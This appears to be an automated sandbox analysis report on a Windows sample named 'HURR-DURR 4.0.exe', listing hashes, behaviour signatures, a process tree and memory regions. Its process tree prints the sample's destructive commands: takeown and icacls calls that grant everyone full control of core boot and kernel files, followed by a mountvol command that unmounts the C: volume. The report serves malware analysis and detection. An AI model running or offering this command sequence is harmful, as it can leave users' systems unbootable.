Resubmissions

12/04/2023, 20:30

230412-zadedagd5s 8

12/04/2023, 20:26

230412-y7t8qaeh72 8

26/03/2023, 16:01

230326-tgmzhahb39 8

Analysis

  • max time kernel
    400s
  • max time network
    1602s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    12/04/2023, 20:30

General

  • Target

    HURR-DURR 4.0.exe

  • Size

    1.7MB

  • MD5

    709002961b4a3d18185690cf820c4758

  • SHA1

    9e45ade994f2d711f12fd1bdd24c76c29190d919

  • SHA256

    39d024d9d590f29e0e522f1e41ac4e5c7bf67ebd261b3fa939b6e0ee883acc59

  • SHA512

    a759d2c16eb3166714d0422e931458ea1bac942f440bd159f7a130e9edaef2fe13090adb4de0ef65d6f66446d929f2152e879d1949c4860654564e9e8f8be916

  • SSDEEP

    12288:JoSWNTJ4Yo1VFnA4r5rraOVokssOcnh2tbbLqhS8aKxk:JoS2TJJo1V6u5rraOVouOcn4tbbR8aqk

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 12 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 12 IoCs
  • Drops file in Windows directory 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HURR-DURR 4.0.exe
    "C:\Users\Admin\AppData\Local\Temp\HURR-DURR 4.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3720
    • C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6343.tmp\6344.tmp\6345.bat "C:\Users\Admin\AppData\Local\Temp\HURR-DURR 4.0.exe""
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1704
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\winload.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4700
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\winresume.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4664
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\ntoskrnl.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4528
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\hal.dll"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1796
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\ntdll.dll"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3012
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\ci.dll"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4360
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\winload.exe" /grant everyone:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4412
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\winresume.exe" /grant everyone:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:5024
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\ntoskrnl.exe" /grant everyone:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4916
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\hal.dll" /grant everyone:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:780
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\ntdll.dll" /grant everyone:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:4280
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\ci.dll" /grant everyone:F /t /cç
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:464
      • C:\Windows\system32\mountvol.exe
        mountvol C:\ /d
        3⤵
          PID:1892
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:4724
    • C:\Windows\system32\browser_broker.exe
      C:\Windows\system32\browser_broker.exe -Embedding
      1⤵
      • Modifies Internet Explorer settings
      PID:3124
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4404
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      PID:3600

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\6343.tmp\6344.tmp\6345.bat

      Filesize

      1003B

      MD5

      fea29a2bbc979a1a83a9887b62240d6e

      SHA1

      b6c1ab3b84f50a1aa567c311b77fade00379b006

      SHA256

      abb42b3699e20f9208261c9ef6105f29be0c1005b47e966b5dd9a78845b6dcb6

      SHA512

      c8ed4b01d15956e668cf4ce215efd0e3708405a3aa2dff30c4a5e4e5a86959308c832f14a4d19b1c0ef9b1491e24fcf8d3388dc155911784b3b8d5b25f790164

    • memory/3600-190-0x0000018019CD0000-0x0000018019CD2000-memory.dmp

      Filesize

      8KB

    • memory/3600-205-0x0000018019710000-0x0000018019724000-memory.dmp

      Filesize

      80KB

    • memory/3600-198-0x000001802A850000-0x000001802A852000-memory.dmp

      Filesize

      8KB

    • memory/3600-196-0x000001802A830000-0x000001802A832000-memory.dmp

      Filesize

      8KB

    • memory/3600-194-0x000001802A770000-0x000001802A772000-memory.dmp

      Filesize

      8KB

    • memory/3600-192-0x0000018019CF0000-0x0000018019CF2000-memory.dmp

      Filesize

      8KB

    • memory/4724-158-0x000001D2222A0000-0x000001D2222A1000-memory.dmp

      Filesize

      4KB

    • memory/4724-163-0x000001D227360000-0x000001D227362000-memory.dmp

      Filesize

      8KB

    • memory/4724-162-0x000001D227330000-0x000001D227332000-memory.dmp

      Filesize

      8KB

    • memory/4724-160-0x000001D2225F0000-0x000001D2225F2000-memory.dmp

      Filesize

      8KB

    • memory/4724-139-0x000001D222900000-0x000001D222910000-memory.dmp

      Filesize

      64KB

    • memory/4724-204-0x000001D2284A0000-0x000001D2284B4000-memory.dmp

      Filesize

      80KB

    • memory/4724-121-0x000001D222120000-0x000001D222130000-memory.dmp

      Filesize

      64KB